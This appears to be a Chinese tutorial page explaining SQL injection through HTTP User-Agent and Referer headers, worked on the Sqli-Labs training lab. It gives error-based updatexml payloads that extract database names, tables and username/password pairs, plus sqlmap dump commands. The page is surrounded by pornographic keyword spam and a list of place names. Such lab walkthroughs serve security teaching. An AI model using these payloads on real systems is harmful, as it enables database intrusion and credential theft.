最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

圖文詳解HTTP頭中的SQL注入

 更新時(shí)間:2021年12月12日 09:16:52   作者:山川綠水  
HTTP頭字段是超文本傳輸協(xié)議(HTTP)中請(qǐng)求和響應(yīng)的部分信息,它們定義了HTTP傳輸?shù)牟僮鲄?shù),下面這篇文章主要給大家介紹了關(guān)于HTTP頭中SQL注入的相關(guān)資料,需要的朋友可以參考下

HTTP頭中的SQL注入

1.HTTP頭中的注入介紹

在安全意識(shí)越來(lái)越重視的情況下,很多網(wǎng)站都在防止漏洞的發(fā)生。例如SQL注入中,用戶提交的參數(shù)都會(huì)被代碼中的某些措施進(jìn)行過濾。

過濾掉用戶直接提交的參數(shù),但是對(duì)于HTTP頭中提交的內(nèi)容很有可能就沒有進(jìn)行過濾。
例如HTTP頭中的User-Agent、Referer、Cookies等。

2.HTTP User-Agent注入

就拿Sqli-Lab-Less18

這里的User-Agent是可控的,因此存在HTTP User-Agent注入

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

Payload內(nèi)容:

updatexml(xml_document,xpath_string,new_value):

第一個(gè)參數(shù):XML文檔對(duì)象名稱。

第二個(gè)參數(shù):XPath字符串。

第三個(gè)參數(shù):替換查找到的符合條件的數(shù)據(jù)。

1.查看版本

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

2.查看數(shù)據(jù)庫(kù)

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

3.得到數(shù)據(jù)庫(kù)security,獲取數(shù)據(jù)表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '1'='1

4.得到數(shù)據(jù)表emails,referers,uagents,users,我們使用的是users表,獲取字段名

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),0x7e),1) or '1'='1

5.獲取字段內(nèi)容

當(dāng)我們使用下面的語(yǔ)句時(shí),會(huì)報(bào)錯(cuò)Subquery returns more than 1 ro

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users),0x7e),1) or '1'='1

返回的數(shù)據(jù)有多行,我們可以使用limit限制其只返回一條數(shù)據(jù)

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) or '1'='1

3.HTTP Referer注入

Sqli-Lab19為例

' or '1'='1

1.查看版本

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

2.查看數(shù)據(jù)庫(kù)

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

3.得到數(shù)據(jù)庫(kù)security,獲取數(shù)據(jù)表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '1'='1

4.得到數(shù)據(jù)表emails,referers,uagents,users,我們使用的是users表,獲取字段名

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),0x7e),1) or '1'='1

5.獲取字段內(nèi)容

當(dāng)我們使用下面的語(yǔ)句時(shí),會(huì)報(bào)錯(cuò)Subquery returns more than 1 row

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users),0x7e),1) or '1'='1

返回的數(shù)據(jù)有多行,我們可以使用limit限制其只返回一條數(shù)據(jù)

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) or '1'='1

4.sqlmap安全測(cè)試

抓取數(shù)據(jù)包,將抓取的全部?jī)?nèi)容,放到文本文檔中,并且在有可能存在注入點(diǎn)的地方加入星號(hào)(*)

1.爆破數(shù)據(jù)庫(kù)

python2 sqlmap.py -r 1.txt --dbs

得到數(shù)據(jù)庫(kù)信息

2.爆破數(shù)據(jù)表

python2 sqlmap.py -r 1.txt -D security --tables

得到數(shù)據(jù)表的信息

3.爆破字段及內(nèi)容

python2 sqlmap.py -r 1.txt -D security -T users --dump

得到數(shù)據(jù)內(nèi)容

PS

1.HTTP User-Agent注入HTTP Referer注入屬于放包攻擊,我們?cè)诜虐倪^程中,必須使用正確的用戶名和密碼;

2.如果探測(cè)出是HTTP頭注入,在使用sqlmap跑的過程中,在末尾加上星號(hào)(*),可以提高滲透測(cè)試的效率

5.HTTP頭部詳解

User-Agent:使得服務(wù)器能夠識(shí)別客戶使用的操作系統(tǒng),游覽器版本等.(很多數(shù)據(jù)量大的網(wǎng)站中會(huì)記錄客戶使用的操作系統(tǒng)或?yàn)g覽器版本等存入數(shù)據(jù)庫(kù)中)

Cookie:網(wǎng)站為了辨別用戶身份、進(jìn)行 session 跟蹤而儲(chǔ)存在用戶本地終端上的數(shù)據(jù)(通常經(jīng)過加密).

X-Forwarded-For:簡(jiǎn)稱XFF頭,它代表客戶端,也就是HTTP的請(qǐng)求端真實(shí)的IP,(通常一些網(wǎng)站的防注入功能會(huì)記錄請(qǐng)求端真實(shí)IP地址并寫入數(shù)據(jù)庫(kù)or某文件[通過修改XXF頭可以實(shí)現(xiàn)偽造IP])

Clien-IP:同上,不做過多介紹.

Rerferer:瀏覽器向 WEB 服務(wù)器表明自己是從哪個(gè)頁(yè)面鏈接過來(lái)的.

Host:客戶端指定自己想訪問的WEB服務(wù)器的域名/IP 地址和端口號(hào)(這個(gè)我本人還沒碰到過,不過有真實(shí)存在的案例還是寫上吧).

總結(jié)

到此這篇關(guān)于HTTP頭中SQL注入的文章就介紹到這了,更多相關(guān)HTTP頭中SQL注入內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • SQL注入漏洞掃描之sqlmap詳解

    SQL注入漏洞掃描之sqlmap詳解

    SQLMap是一款自動(dòng)執(zhí)行SQL注入的審計(jì)工具,支持多種SQL注入技術(shù),包括布爾型盲注、時(shí)間型盲注、報(bào)錯(cuò)型注入、聯(lián)合查詢注入和堆疊查詢注入
    2025-01-01
  • 數(shù)據(jù)庫(kù)查詢排除重復(fù)記錄的方法

    數(shù)據(jù)庫(kù)查詢排除重復(fù)記錄的方法

    這篇文章主要介紹了數(shù)據(jù)庫(kù)查詢排除重復(fù)記錄的方法,使用DISTINCT語(yǔ)句實(shí)現(xiàn),需要的朋友可以參考下
    2014-06-06
  • SQL之left join、right join、inner join的區(qū)別淺析

    SQL之left join、right join、inner join的區(qū)別淺析

    這篇文章主要介紹了SQL之left join、right join、inner join的區(qū)別淺析,本文講解了它們的區(qū)別并給出了實(shí)例,需要的朋友可以參考下
    2015-02-02
  • SQL中IS NOT NULL與!=NULL的區(qū)別

    SQL中IS NOT NULL與!=NULL的區(qū)別

    這篇文章主要介紹了SQL中IS NOT NULL與!=NULL的區(qū)別,本文詳細(xì)訴說(shuō)了它們的區(qū)別,以及推薦使用方法,需要的朋友可以參考下
    2015-06-06
  • 你真的知道怎么優(yōu)化SQL嗎

    你真的知道怎么優(yōu)化SQL嗎

    這篇文章主要給大家介紹了關(guān)于優(yōu)化SQL的相關(guān)資料,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用SQL具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-06-06
  • SQL SERVER 里的錯(cuò)誤處理(try catch)

    SQL SERVER 里的錯(cuò)誤處理(try catch)

    SQL SERVER里,也有TRY CATCH。格式如下
    2009-02-02
  • 安裝navicat最新詳細(xì)流程

    安裝navicat最新詳細(xì)流程

    Navicat是一款獨(dú)立的數(shù)據(jù)庫(kù)管理工具,支持多種數(shù)據(jù)庫(kù)管理系統(tǒng),包括MySQL、MariaDB、Oracle、PostgreSQL、SQLite等,下面這篇文章主要給大家介紹了關(guān)于安裝navicat最新詳細(xì)流程,需要的朋友可以參考下
    2023-06-06
  • 本地SQL注射攻略分析曝光

    本地SQL注射攻略分析曝光

    以后會(huì)陸續(xù)給大家講一些本人的入侵經(jīng)驗(yàn),一天學(xué)一點(diǎn),這東西雖然我玩膩了,但是還是很想給大家入門時(shí)的一些幫助。本地SQL注射,可能很多朋友都沒有聽說(shuō)過,下面biweilun為大家講解下概念及其應(yīng)用
    2008-07-07
  • 高性能分析數(shù)據(jù)庫(kù)StarRocks的安裝與使用詳解

    高性能分析數(shù)據(jù)庫(kù)StarRocks的安裝與使用詳解

    在大數(shù)據(jù)時(shí)代,選擇一個(gè)高性能的分析數(shù)據(jù)庫(kù)對(duì)業(yè)務(wù)的成功至關(guān)重要,StarRocks作為一款次世代MPP數(shù)據(jù)庫(kù),以其卓越的實(shí)時(shí)分析和多維分析能力而聞名,下面小編就來(lái)和大家聊聊它的具體安裝與使用吧
    2025-03-03
  • 面向云服務(wù)的GaussDB全密態(tài)數(shù)據(jù)庫(kù)現(xiàn)狀及問題小結(jié)

    面向云服務(wù)的GaussDB全密態(tài)數(shù)據(jù)庫(kù)現(xiàn)狀及問題小結(jié)

    全密態(tài)數(shù)據(jù)庫(kù),顧名思義與大家所理解的流數(shù)據(jù)庫(kù)、圖數(shù)據(jù)庫(kù)一樣,就是專門處理密文數(shù)據(jù)的數(shù)據(jù)庫(kù)系統(tǒng),這篇文章主要介紹了面向云服務(wù)的GaussDB全密態(tài)數(shù)據(jù)庫(kù),未來(lái)GaussDB會(huì)將該能力逐步開源到openGauss,與社區(qū)共同推進(jìn)和完善全密態(tài)數(shù)據(jù)庫(kù)解決方案,一起打造數(shù)據(jù)庫(kù)安全生態(tài)
    2024-02-02

最新評(píng)論

广德县| 丰都县| 金沙县| 合阳县| 凤山县| 塔城市| 德格县| 汾西县| 四川省| 广安市| 科尔| 武鸣县| 金寨县| 新津县| 宣汉县| 玉屏| 东丰县| 宁河县| 灌南县| 绥宁县| 青岛市| 安义县| 沂南县| 莆田市| 安泽县| 岳池县| 余庆县| 潜江市| 柏乡县| 绥阳县| 高陵县| 临颍县| 通辽市| 武宣县| 太湖县| 从江县| 车险| 上虞市| 伊金霍洛旗| 伊金霍洛旗| 永济市|